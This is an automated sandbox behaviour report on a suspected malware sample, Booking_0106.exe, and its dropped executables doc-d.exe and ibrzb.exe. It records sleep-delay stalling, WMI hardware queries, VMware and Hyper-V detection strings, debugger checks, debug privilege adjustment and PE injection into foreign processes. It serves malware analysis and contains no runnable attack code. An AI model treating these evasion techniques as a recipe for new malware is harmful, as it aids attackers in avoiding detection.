Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996593s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996365s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996246s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2996031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995921s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995702s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995590s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2995046s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994718s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe TID: 7620	Thread sleep time: -2994390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7796	Thread sleep count: 2984 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7796	Thread sleep count: 1196 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98193s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -98063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -97735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe TID: 7792	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8048	Thread sleep count: 700 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8048	Thread sleep count: 2687 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99124s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98571s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -98232s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 8044	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 2008	Thread sleep count: 1414 > 30
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 2008	Thread sleep count: 2566 > 30
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99641s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99421s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99200s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -99078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98960s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98858s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98734s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98625s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98516s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98297s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -98078s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibrzb.exe TID: 1188	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Booking_0106.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 3000000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999857	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999734	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999600	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999172	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2999030	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998794	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998241	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998139	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2998031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997803	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997576	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997468	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2997031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996593	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996365	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996246	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996140	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2996031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995921	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995702	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995590	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995156	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2995046	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994828	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994718	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994604	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Thread delayed: delay time: 2994390	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99657	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98938	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98813	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98703	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98594	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98469	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98193	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 98063	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 97735	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 97610	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98797	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98571	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98232	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99875
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99766
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99641
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99531
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99421
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99312
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99200
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 99078
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98960
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98858
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98734
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98625
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98516
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98406
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98297
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98187
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 98078
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 97859
Source: C:\Users\user\AppData\Roaming\ibrzb.exe	Thread delayed: delay time: 922337203685477

Source: Booking_0106.exe, 00000000.00000002.1730902985.00000000056A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: bUQemUjXJw
Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: ibrzb.exe.0.dr	Binary or memory string: ProductNameVMware Workstation>
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: ibrzb.exe.0.dr	Binary or memory string: VMware, Inc.
Source: ibrzb.exe.0.dr	Binary or memory string: CommentsVMware Player:
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ibrzb.exe.0.dr	Binary or memory string: VMware, Inc.1
Source: ibrzb.exe.0.dr	Binary or memory string: VMware, Inc.0
Source: ibrzb.exe.0.dr	Binary or memory string: VMware Workstation%
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: doc-d.exe, 00000001.00000002.2269121553.0000000000851000.00000004.00000020.00020000.00000000.sdmp, ibrzb.exe, 00000004.00000002.2959629553.0000000000D32000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Booking_0106.exe, 00000002.00000002.2984901096.00000000063E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllHA
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: ibrzb.exe.0.dr	Binary or memory string: CompanyNameVMware, Inc.D
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ibrzb.exe, 00000009.00000002.2958088003.00000000011E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: ibrzb.exe, 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: ibrzb.exe, 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: ibrzb.exe.0.dr	Binary or memory string: FileDescriptionVMware Player:
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: ibrzb.exe.0.dr	Binary or memory string: noreply@vmware.com
Source: ibrzb.exe.0.dr	Binary or memory string: VMware Player
Source: ibrzb.exe.0.dr	Binary or memory string: VMware Workstation
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Booking_0106.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\Booking_0106.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\doc-d.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Booking_0106.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

